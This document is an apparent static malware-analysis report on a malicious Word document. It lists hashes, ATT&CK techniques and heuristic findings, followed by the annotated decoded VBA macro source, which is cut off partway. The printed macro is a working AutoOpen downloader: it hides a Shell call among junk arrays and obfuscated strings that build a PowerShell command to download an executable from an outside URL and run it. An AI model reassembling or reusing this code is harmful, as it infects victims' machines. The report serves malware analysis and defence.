Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3fc4f8c1317a71ca…

MALICIOUS

Office (OLE)

Size: 72.8 KB · Created: 2018-09-13 08:33:00 · Authoring application: Microsoft Office Word · First seen: 2019-04-18
MD5: cfc289608cb149e9996c8836fbe080b7 SHA-1: 502f310b2e7daf6b4c86b8f53e52b5a70fc1cd75 SHA-256: 3fc4f8c1317a71ca882323a9fdee6e1b23f806baf88c5692394edfdf7089993c
Risk score: 82

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell function with a command string that is assembled at runtime by concatenating the return values of helper functions (the one helper visible in the extracted source builds a heavily obfuscated cmd.exe/PowerShell command line); launching such a command from an auto-executing macro is a common way to download and run a further payload. The AutoOpen trigger, the junk-code padding and the string-building structure together suggest a macro-based downloader.

Heuristics 4

  • VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro — high — OLE_VBA_AUTOOPEN
    Document contains an AutoOpen macro, which Word runs automatically when the document is opened and macros are enabled.
  • Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: this rule's wording conflicts with OLE_VBA_MACROS above and with the carved macros.bas, which show that a VBA project was in fact recovered from this sample; treat the two findings as overlapping evidence for the same AutoOpen execution surface rather than as independent detections.)
  • Embedded URL — info — EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace URI that Office itself embeds, not a network contact indicator; it should not be treated as an IoC.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4189 bytes
SHA-256: d7ae1f108c31b045c51a1093f0aa93a93445ff005e3b631ca90f218b771e4703
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cCTwiwTZabatl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: VBE module header as exported by olevba. VB_Base = "1Normal.ThisDocument" is what Word
' writes for the document's ThisDocument class module, so the AutoOpen below is hosted by the document
' itself rather than by a separate standard module. The module name looks machine-generated (random
' letters), consistent with the obfuscation used throughout the rest of the macro.
Sub AutoOpen()
' Word auto-execution entry point: runs when the document is opened and macros are enabled.
' Analyst note: the only effective statement in this Sub is the Shell call below; every Dim/ReDim
' block around it is filler.
On _
Error _
Resume _
Next
' "On Error Resume Next" split over four physical lines with "_" continuations. It silences every
' runtime error in this Sub, and the split defeats naive single-line pattern matching on the phrase.
   Dim uiFqXo()
ReDim uiFqXo(5)
uiFqXo(0) = 42818982
uiFqXo(1) = 4899780
uiFqXo(2) = 82
uiFqXo(3) = 368516641
uiFqXo(4) = 2367

   Dim mSzwjJ()
ReDim mSzwjJ(3)
mSzwjJ(0) = 1
mSzwjJ(1) = 8731
mSzwjJ(2) = 7035

   Dim DCRfjr()
ReDim DCRfjr(4)
DCRfjr(0) = 537
DCRfjr(1) = 245
DCRfjr(2) = 610
DCRfjr(3) = 3

   Dim GkTdGF()
ReDim GkTdGF(5)
GkTdGF(0) = 257117156
GkTdGF(1) = 1
GkTdGF(2) = 3203
GkTdGF(3) = 5
GkTdGF(4) = 38

   Dim Ocbplp()
ReDim Ocbplp(2)
Ocbplp(0) = 41
Ocbplp(1) = 532

   Dim IPvAQY()
ReDim IPvAQY(4)
IPvAQY(0) = 529942023
IPvAQY(1) = 737
IPvAQY(2) = 502383970
IPvAQY(3) = 1093

' The integer arrays above (and below the Shell call) are written and never read anywhere in this
' Sub: junk code inserted to pad the module and dilute signature/heuristic matching.
Shell@ uimDvBOG + QBMAznYjL + omIQhANzYMSw, Format(0)
' Command string = concatenation of three helper functions. Only uimDvBOG is present in this listing
' (next module); QBMAznYjL and omIQhANzYMSw fall outside the truncated extract. uimDvBOG assembles a
' caret-escaped cmd.exe line that appears to reverse a stored string with a for /L loop and hand it to
' PowerShell (see the reversed "powershell" / "DownloadFile" / "Net.WebClient" fragments in its
' string literals). Format(0) yields the string "0", which VBA coerces to window style 0 (vbHide),
' so the spawned console is not shown. The "@" type suffix on Shell is an obfuscation quirk; whether
' it alters parsing on a real host is not established here — TODO confirm in a sandbox.
   Dim PUqIzb()
ReDim PUqIzb(4)
PUqIzb(0) = 98
PUqIzb(1) = 77
PUqIzb(2) = 13
PUqIzb(3) = 6487

   Dim NSpVun()
ReDim NSpVun(5)
NSpVun(0) = 362819428
NSpVun(1) = 430
NSpVun(2) = 8
NSpVun(3) = 477
NSpVun(4) = 367910916

   Dim PddisO()
ReDim PddisO(5)
PddisO(0) = 3
PddisO(1) = 329821373
PddisO(2) = 921
PddisO(3) = 344097831
PddisO(4) = 499378655

End Sub



Attribute VB_Name = "HkbiEEzF"
' Analyst note: header of a second module (name again looks random). It holds uimDvBOG, the first of
' the three helper functions whose concatenated return values AutoOpen passes to Shell.
Function uimDvBOG()

On _
Error _
Resume _
Next
Dim CBVZzf()
ReDim CBVZzf(4)
CBVZzf(0) = 7816
CBVZzf(1) = 205
CBVZzf(2) = 8194
CBVZzf(3) = 191559335

   Dim tFNVk()
ReDim tFNVk(4)
tFNVk(0) = 341
tFNVk(1) = 4
tFNVk(2) = 3159
tFNVk(3) = 557

   Dim mhCRjU()
ReDim mhCRjU(2)
mhCRjU(0) = 5
mhCRjU(1) = 9

kzzXNMo = Format(Chr(12 + 3 + 13 + 5 + 66)) + "md /V^" + ":^O/" + Format(Chr(8 + 2 + 8 + 3 + 46)) + Format(Chr(4 + 1 + 4 + 1 + 24)) + "s^e" + "^t ^6^D^" + "3=   ^ ^ ^ ^ ^     ^  ^ ^ " + " ^}^}^{h" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^t^a" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "}^;^k^a^erb^;" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^u^i$" + "^ ^m^et^I^-^e^" + "k^ovnI;)" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "u^i$ ^,^P^w"
Dim nwszj()
ReDim nwszj(3)
nwszj(0) = 129
nwszj(1) = 219611032
nwszj(2) = 278

wXLQDbzoA = "^o^$(^el^i^F^da^o^ln^w" + "o^D.t^" + "t^Q^${^yrt{)B^p^Z^$^ ni " + "Pwo^$(h" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^a^ero^f" + "^;^'^ex^e.^" + "'^+^Q^BB^$^+^'^" + "\'+" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "il^bu^p:vn^e^$=" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^u"
Dim CpYkwd()
ReDim CpYkwd(5)
CpYkwd(0) = 9
CpYkwd(1) = 6
CpYkwd(2) = 7
CpYkwd(3) = 77
CpYkwd(4) = 482

   Dim REjMGT()
ReDim REjMGT(3)
REjMGT(0) = 6987
REjMGT(1) = 56746321
REjMGT(2) = 8210

bhhiHB = "i$^;'5^" + "43^' ^=" + " Q^BB^$^;)'^@'(t" + "^i^lpS.'n^k^t^." + "^3yliq=l?ph^p.d^op" + "ovm^e^k/^" + "EO^X/^mo" + Format(Chr(12 + 3 + 13 + 5 + 66)) + ".^atf^osi^m" + "^em//^:^p^tt^h^'^=^BpZ$;tne^i" + "l" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "^b^e^W^.teN^ ^t" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "ejbo-^w"
Dim dikcNK()
ReDim dikcNK(2)
dikcNK(0) = 62
dikcNK(1) = 2

   Dim pZhCjD()
ReDim pZhCjD(3)
pZhCjD(0) = 39
pZhCjD(1) = 3
pZhCjD(2) = 4

onjDn = "en=ttQ$ ^l^l^e^h^sr^ew^o^" + "p&&^f^or /^L %" + Format(Chr(8 + 2 + 8 + 3 + 46)) + " ^in (" + "^259,-^1^,0)^d^o ^se^t ^w" + "n=!^wn!!^6^D^3:~%" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "," + "1!&&i^f %" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "=^=^0 " + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^a^" + "l^l %^wn:"
Dim jSvnK()
ReDim jSvnK(2)
jSvnK(0) = 7289
jSvnK(1) = 9

   Dim hBJZdp()
ReDim hBJZdp(5)
hBJZdp(0) = 8
hBJZdp(1) = 41
hBJZdp(2) = 18
hBJZdp(3) = 8428
hBJZdp(4) = 20

   Dim lzPrb()
ReDim lzPrb(5)
lzPrb(0) = 55
lzPrb(1) = 811
lzPrb(2) = 6481
lzPrb(3) = 7
lzPrb(4) = 538

   Dim HuvVA()
ReDim HuvVA(2)
HuvVA(0) = 158
HuvVA(1) = 4

SSKqQiO = "*^wn^!=%" + Format(Chr(4 + 1 + 4 + 1 + 24)) + ""
uimDvBOG = kzzXNMo + wXLQDbzoA + bhhiHB + onjDn + SSKqQiO
   Dim pAbVR()
ReDim pAbVR(2)
pAbVR(0) = 2782
pAbVR(1) = 197506680

   Dim fXNbV
... (truncated)